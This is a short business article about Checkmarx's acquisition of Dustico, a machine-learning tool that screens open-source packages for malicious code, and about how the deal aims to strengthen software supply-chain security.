Checkmarx x Dustico: Developing Safer Supply Chain Software
Open-source software is a double-edged sword: it cuts development costs—but puts you at risk. After all, open sourcing your supply chain may mean downloading hundreds of packages of code. Let’s say even one of those packages hides malicious code. That leaves your company and any of your clients that rely on your software open to cyberattack.
According to the European Union’s (EU) cybersecurity agency, ENISA, we might see a four-fold increase in supply chain attacks in 2021 versus 2020. Part of this is because those malicious actors—cybercriminals—get even better at what they do. Part of it is because companies have moved more of their supply chain systems online with remote work. And finally, recent attacks, such as those on Colonial Pipeline, JBS Foods, and Kaseya, have incentivised cybercriminals with a prize: ransom money, and lots of it.
Where Does Checkmarx Come In?
Founded in Israel, Checkmarx serves clients such as Sony, Visa, and SAP. Offering software security tools that reduce risk across proprietary code, open-source code, and APIs, it wants to make your software less vulnerable. Indeed, over half of the Fortune 50 use its security tech and services to optimise their software development at scale, which places it as one of the leaders of supply chain security.
Recently, it acquired Dustico, a platform powered by machine learning that analyses and detects malicious code. To do so, it pokes around to see how credible the software’s contributors are, how often the package is updated, and how well it’s maintained. (All give hints as to its reliability.)
‘It’s important to evaluate what [your] code does when you run it—and who created it in the first place’, says Robert Haynes, a Software Composition Analysis (SCA) and Open Source Evangelist at Checkmarx. ‘Evaluating what processes [a piece of software] creates, what ports it opens, and what connections it attempts to make are all critical indicators of its intent’.
- Automatically detects abnormal behaviours in code packages
- Checks indicators of compromise (IOCs) to quickly detect a cyberattack
- Collects packages for analysis as soon as they’re published
- Integrates into the Checkmarx platform—meaning that the company’s developers benefit from a frictionless experience
How Will This Strengthen Supply Chains?
According to Dustico, supply chain attacks often shield malicious code in open-source packages. It warns: ‘Developers must apply a zero-trust security mindset’. Now, as Checkmarx adds Dustico’s analysis engine to its existing software tool, CxCSA, it’ll be able to scout and identify signs of danger. Together, they’ll target ransomware, multi-stage attacks, and Trojan horses, in which evil code is smuggled in via unassuming downloads.
Essentially: companies that take cyber risks seriously can eliminate culpable software, screen for shifty contributors, and ensure they don’t let wolves dressed as sheep into their system. But it requires, as some say, constant vigilance. Concludes Maty Simon, CTO at Checkmarx: ‘Development teams must operate with the proactive assumption that all code may have been maliciously manipulated’.
In the end, Checkmarx asks: how seriously will you treat supply chain cyber risk?